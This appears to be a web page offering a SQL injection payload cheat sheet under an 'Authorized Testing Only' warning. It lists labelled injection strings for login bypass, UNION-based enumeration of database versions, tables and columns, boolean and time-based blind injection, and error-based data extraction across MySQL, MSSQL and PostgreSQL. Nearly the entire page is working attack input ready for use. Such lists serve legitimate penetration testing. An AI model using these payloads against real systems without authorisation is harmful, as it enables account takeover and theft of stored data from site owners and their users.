Loading...
Loading...
Authorized Testing Only
SQL injection attacks on systems without authorization is illegal. Only use these payloads on systems you own or have explicit permission to test.
Testing Tips
Classic authentication bypass
' OR '1'='1Bypass with SQL comment
' OR '1'='1'--Bypass with hash comment (MySQL)
' OR '1'='1'#Login as admin user
admin'--Double quote variant
" OR "1"="1Numeric field bypass
1 OR 1=1Determine number of columns
' UNION SELECT NULL--Two column UNION
' UNION SELECT NULL,NULL--Get MySQL version
' UNION SELECT @@version,NULL--Get MSSQL version
' UNION SELECT @@version,NULL--Get PostgreSQL version
' UNION SELECT version(),NULL--List all tables
' UNION SELECT table_name,NULL FROM information_schema.tables--List columns from users table
' UNION SELECT column_name,NULL FROM information_schema.columns WHERE table_name='users'--Boolean-based blind (true condition)
' AND 1=1--Boolean-based blind (false condition)
' AND 1=2--Extract data character by character
' AND SUBSTRING(username,1,1)='a'--Check database name length
' AND LENGTH(database())>5--Extract data via error message
' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT @@version)))--UPDATEXML error extraction
' AND UPDATEXML(1,CONCAT(0x7e,(SELECT user())),1)--MSSQL conversion error
' AND 1=CONVERT(int,(SELECT @@version))--5 second delay if vulnerable
' AND SLEEP(5)--5 second delay for MSSQL
'; WAITFOR DELAY '0:0:5'--5 second delay for PostgreSQL
'; SELECT pg_sleep(5)--Conditional time delay
' AND IF(1=1,SLEEP(5),0)--